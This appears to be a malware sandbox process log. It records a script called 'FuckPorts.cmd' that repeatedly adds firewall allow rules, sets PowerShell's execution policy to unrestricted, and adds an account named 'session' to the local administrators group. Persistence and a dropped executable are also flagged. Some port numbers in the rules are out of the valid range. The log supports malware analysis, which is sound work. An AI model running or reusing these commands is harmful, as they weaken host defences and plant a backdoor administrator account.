C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3636
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1460
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4920
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4824
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4860
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4340
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3492
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:5068
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1184
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3156
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2012
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3704
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3636
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4316
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4952
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3720
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:752
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:660
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1104
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3564
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:5084
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1104
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4056
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4332
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2748
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3208
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3220
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:5068
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3484
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4436
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4060
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3704
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4092
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3516
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3088
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:400
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:5068
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:5020
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1568
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2740
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1544
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:676
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1140
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4568
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3604
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4296
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4952
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:2448
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264 -
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:2688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:2484
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4996
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:532
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2020
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2576
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3904
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4092
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4540
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2504
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2564
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2256
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4348
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1580
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3104
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:5112
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4072
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2996
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3132 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1548
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1672
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
- Adds Run key to start application
PID:2900 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:320
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4056
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4780
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:456
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1596
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2812
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1972
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1188
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1352
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1640
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4268
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1640
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4528
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4268
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:5112
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4092
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4872
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2336
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1404
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3088
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1876
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:428
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2812
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3904
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2812
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1460
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2428
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2812
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4060
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1676
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2956
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2568
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:632
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3184
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4092
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4692
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
- Executes dropped EXE
PID:2428 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3408
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4796
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3132
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1348
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1580
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4820
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2068
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4112
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4872
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1672
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4948
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1456
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:940
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1184
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4060
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3492
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:660
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3876
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:940
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4796
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4000
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:740
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1680
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1580
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2316
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2284
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3876
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4368
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4340
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:660
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2936
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3136
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4568
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:676
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3720
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3964
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3320
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:5008
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3796
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4332
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4784
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3936
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:400
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1868
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3632
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3704
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4092
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:5076
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:5020
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4092
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4340
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1348
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1104
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵